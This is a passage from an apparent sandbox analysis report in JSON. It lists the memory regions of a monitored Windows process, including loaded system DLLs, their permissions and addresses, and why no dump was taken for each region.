[ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953464319, "entry_point": 1953431552, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2113", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:03:34.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953497088, "type": "region", "version": 1 }, "end_va": 1953873919, "entry_point": 1953497088, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2114", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953497088, "timestamp": "00:03:34.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953890304, "type": "region", "version": 1 }, "end_va": 1954148351, "entry_point": 1953890304, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2115", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953890304, "timestamp": "00:03:34.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2116", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:03:34.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2117", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1273855, "entry_point": 851968, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2118", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_2119", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 7012351, "entry_point": 0, "filename": null, "id": "region_2120", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960574976, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2121", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960640512, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2122", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961426944, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2123", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965359104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2124", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965686784, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2125", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973354496, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2126", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:03:34.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993867264, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2127", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:03:34.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_2128", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:03:34.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_2129", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:03:34.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2130", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:03:34.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2131", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:03:34.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970864128, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2132", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:03:34.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964179456, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2133", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:03:34.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970798592, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2134", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:03:34.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1968898048, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2135", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:03:34.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2136", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:03:34.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 253951, "entry_point": 131072, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2137", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 131072, "timestamp": "00:03:34.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 8617983, "entry_point": 0, "filename": null, "id": "region_2138", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:03:34.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2140", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:03:34.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974468608, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2141", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:03:34.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8650752, "type": "region", "version": 1 }, "end_va": 10227711, "entry_point": 0, "filename": null, "id": "region_2142", "name": "pagefile_0x0000000000840000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8650752, "timestamp": "00:03:34.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 16711680, "type": "region", "version": 1 }, "end_va": 37683199, "entry_point": 0, "filename": null, "id": "region_2143", "name": "pagefile_0x0000000000ff0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 16711680, "timestamp": "00:03:34.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_2144", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:03:34.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2145", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:03:34.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_2146", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:03:34.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_2147", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:03:34.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 14430207, "entry_point": 0, "filename": null, "id": "region_2148", "name": "pagefile_0x00000000009d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10289152, "timestamp": "00:03:34.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1973342207, "entry_point": 1972174848, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_2149", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:03:34.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1963769855, "entry_point": 1963720704, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_2150", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:03:34.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1975844864, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_2151", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:03:34.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963786240, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2152", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:03:34.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1961558016, "type": "region", "version": 1 }, "end_va": 1961578495, "entry_point": 1961558016, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_2153", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1961558016, "timestamp": "00:03:34.958", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967456256, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2154", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:03:34.959", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1967411199, "entry_point": 1966407680, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_2155", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:03:34.961", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1992556544, "type": "region", "version": 1 }, "end_va": 1993826303, "entry_point": 1992556544, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_2156", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1992556544, "timestamp": "00:03:34.961", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991639040, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2157", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:03:34.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1961623552, "type": "region", "version": 1 }, "end_va": 1963700223, "entry_point": 1961623552, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_2158", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1961623552, "timestamp": "00:03:34.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1955463168, "type": "region", "version": 1 }, "end_va": 1955495935, "entry_point": 1955463168, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2159", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1955463168, "timestamp": "00:03:34.965", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1572864, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 16056319, "entry_point": 0, "filename": null, "id": "region_2160", "name": "private_0x0000000000dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14483456, "timestamp": "00:03:34.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1955332096, "type": "region", "version": 1 }, "end_va": 1955422207, "entry_point": 1955332096, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2161", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1955332096, "timestamp": "00:03:34.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1687551, "entry_point": 1441792, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2162", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:03:34.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955069952, "type": "region", "version": 1 }, "end_va": 1955311615, "entry_point": 1955069952, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2167", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955069952, "timestamp": "00:03:34.974", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 37683200, "type": "region", "version": 1 }, "end_va": 40628223, "entry_point": 37683200, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2168", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 37683200, "timestamp": "00:03:34.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_2169", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_2170", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_2171", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_2172", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_2173", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5832703, "entry_point": 0, "filename": null, "id": "region_2174", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 14745599, "entry_point": 0, "filename": null, "id": "region_2175", "name": "private_0x0000000000dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14483456, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14876672, "type": "region", "version": 1 }, "end_va": 15138815, "entry_point": 0, "filename": null, "id": "region_2176", "name": "private_0x0000000000e30000", "norm_filename": null, "region_type": "private_memory", "start_va": 14876672, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 15532032, "type": "region", "version": 1 }, "end_va": 16056319, "entry_point": 0, "filename": null, "id": "region_2177", "name": "private_0x0000000000ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 15532032, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 16318464, "type": "region", "version": 1 }, "end_va": 16580607, "entry_point": 0, "filename": null, "id": "region_2178", "name": 